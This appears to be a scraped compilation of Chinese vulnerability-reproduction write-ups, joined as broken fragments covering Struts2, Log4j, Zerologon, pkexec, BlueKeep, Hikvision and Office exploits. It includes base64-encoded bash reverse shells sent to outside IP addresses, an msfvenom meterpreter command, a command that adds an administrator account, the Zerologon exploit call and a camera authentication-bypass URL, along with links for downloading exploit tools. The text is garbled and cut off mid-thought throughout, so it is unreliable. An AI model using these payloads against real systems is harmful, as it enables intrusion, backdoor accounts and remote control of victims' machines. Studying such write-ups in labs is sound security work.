[漏洞名称]:CVE-2023-32233 NetFilter权限提升 [漏洞描述]:由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客
2017年7月7日,Apache Struts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2和Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击 基础环境 1.Ubuntu 作为靶机:192.168.159.134 2.Ubuntu使用docker获取Struts2-048靶场 源码部署过程 首先Ubuntu已经安装了docker环境。 在s2-048这个文件有一个由compose编写的靶场环境的docker-compose.yml,前面已经安装好了compose,现在创建并启动它。 漏洞复现过程 漏洞POC: 链接:http://pan.baidu.com/s/1dFL7r0X 密码:uvg2 点击Struts 1 Integration,在出现的表单输入任意数据并提交,这里提前使用 总结 这个漏洞复现比较简单,关键在于docker靶场的搭建。本文所用的git资源,还有很多其他的struts2的漏洞环境,有兴趣的小伙伴们可以深究。如果在环境搭建上有疑问,欢迎给斗哥留言。
作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: SERVER ====== Windows 2008r2 7601 ** link OPENED AS SYSTEM ** Windows 2012r2 9600 ** link OPENED 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems SP2 cve-2019-0803 cmd “net user admin999 admin /add” ?
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ?
本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache Apache Log4j 2.8.2之 前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ? runtime‐exec‐payloads.html #命令编码工具 java ‐jar ysoserial.jar CommonsCollections5 "bash ‐c {echo,YmFzaCAtaSA+JiAvZGV 2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5ODggMD4mMQ
cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 /pwn 2" ) # 写入 os.mkdir(wd + "/GCONV_PATH=.") # 创建目录 ''' 关于GCONV_PATH的相关知识 php在执行iconv函数时,实际上调用glibc /tmp/自定义字符集名字小写 2 过程 1. 设定GCONV_PATH 指向 gconv-modules 文件 2. ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现
漏洞介绍 1.1 漏洞描述 2022年04月13号,apache官网公布了Struts2 最新版远程代码执行漏洞,该漏洞编号为CVE-2021-31805。 本次漏洞是对CVE-2020-17530修复之后的绕过,当使用语法%{...}应用强制OGNL解析,某些tag标签的属性仍然可以被二次解析。 漏洞复现 本次漏洞复现为本地环境,使用开源靶场vulhub中s2-61的环境: https://github.com/vulhub/vulhub/tree/master/struts2/s2-061 使用命令 :docker-compose up -d --build启动环境: 看下当前的端口:docker ps 直接访问:http://127.0.0.1:8080/ 因为本次复现的是S2-62的漏洞, :8080/ 执行命令: python3 s2-062.py --url http://127.0.0.1:8080/ --cmd ls 漏洞复现之后,记得及时关闭环境: docker-compose
vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空 影响版本 Windows Server 2008 R2 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR https://www.cnblogs.com/goabout2/p/13676527.html https://www.secura.com/blog/zero-logon
本文作者:\xeb\xfe(来自信安之路作者团队) 近日,红帽官方发布了安全更新,修复了编号为 CVE-2018-1111 的远程代码执行漏洞,攻击者可以通过伪造 DHCP 服务器发送响应包,攻击红帽系统 影响版本 1、Red Hat Enterprise Linux Server 6 2、Red Hat Enterprise Linux Server 7 3、CentOS 6 4、CentOS 7 漏洞详情 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建
0x00 前言 ---- 如果有想一起做漏洞复现的小伙伴,欢迎加入我们,公众号内点击联系作者即可 提示:由于某些原因,公众号内部分工具即将移除,如果有需要的请尽快保存 0x01 漏洞概述 ---- 最近 hackerone才公开了Nexus Repository Manager 2.X漏洞细节,该漏洞默认存在部署权限账号,成功登录后可使用“createrepo”或“mergerepo”自定义配置,可触发远程命令执行漏洞 System32\\cmd.exe /k dir&"}],"id":"00012bdb034073a3","notes":""} 0x05 修复方式 ---- 下载官方的修复版2.14.14-01 小结:复现过程中遇到了很多问题 ,多亏了达哥的帮助才顺利的完成整个复现过程,非常感谢达哥!
现在两个机器能ping通 然后本次演练的机子并没有0708这个漏洞我就简单操作下 其实是家里网慢对应版本的靶子有收集过 ed2k://|file|cn_windows_7_ultimate_with_sp1 3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 0X1环境搭建 攻击机:kali 靶 机:Win10 x64位 0X2 漏洞利用 生成一个ps后门程序: msfvenom -p windows/x64/meterpreter/reverse_tcplhost
CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456
作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ? 0x03 漏洞影响版本: HikvisionDS-2CD2xx2F-ISeries5.2.0build140721 版本至5.4.0build160530版本; DS-2CD2xx0F-ISeries5.2.0build140721 版本至5.4.0Build160401版本; DS-2CD2xx2FWDSeries5.3.1build150410 版本至5.4.4Build161125版本; DS-2CD4x2xFWDSeries5.2.0build140721 版本至5.4.0Build160414版本; DS-2CD4xx5Series5.2.0build140721 版本至5.4.0Build160421版本; DS-2DFxSeries5.2.0build140805
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 0x02 漏洞概述 漏洞编号CVE-2020-17530 CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒 ,而CVE-2020-17530绕过了该沙盒。 0x05 漏洞复现 1、发送如下数据包,即可执行反弹shell命令: POST /index.action HTTP/1.1 Host:192.168.20.129:8080 Accept-Encoding 2、这里为反弹shell命令: (#arglist.add("bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE
声明:供漏洞理解学习及安全加固解决方案,请勿利用漏洞于非法途径,后果自负 ---- 复现工具:(复现工具很多,都可以测一下,个人比较喜欢集成化不太好的,方便理解) https://github.com/ tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce 下载复现工具: git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git ---- 一.本地调用计算器复现 1.本地生成Exploit.class恶意文件类,里面写入了恶意代码calc X:\XXX\XXX\XXXX\XXXXX\CVE-2021-44228-Apache-Log4j-Rce-main http.server 8888 #开启http服务,python3使用http.server image.png 3.开启LDAP监听 cd X:\XXX\XXX\XXXX\XXXXX\CVE 也就是说,log4j2漏洞版本只要是能写日志的,都可以触发 X:\XXX\XXX\XXXX\XXXXX\CVE-2021-44228-Apache-Log4j-Rce-main\src\main\java
项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! 其他问题,在issue提问,或到blog1或blog2评论区提问。 注意事项 请严格按照文档中给出的版本进行测试,没有清理脚本,严重建议使用前打好系统快照! ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行 Update功能,定期对系统进行自动更新 2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。
前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp * 系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 0X1 漏洞影响 漏洞影响了很大一部分系统版本: Windows 7 Windows Server 2008 Windows Server 2008 R2 Windows /github.com/zerosum0x0/CVE-2019-0708 ?
0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 \ target 使用set RHOSTS 设置靶机IP 使用set RPORT 设置靶机PORT 使用set target ID数字(可选为1-4)每种都代表了机器架构 在我的复现环境中使用 target 3即可,如若不行尝试使用1,2,4 ? 解决方法:1.靶机IP无法访问,关闭防火墙 2.开启3389端口 3) 每次攻击都导致蓝屏 解决方法:1.尝试更换target id 2.查看对应系统版本是否正确 4) 模块加载不成功 解决方法: .html kali 更新msf: https://www.cnblogs.com/zuoxiaolongzzz/p/8927173.html CVE-2019-0708远程桌面代码执行漏洞复现: https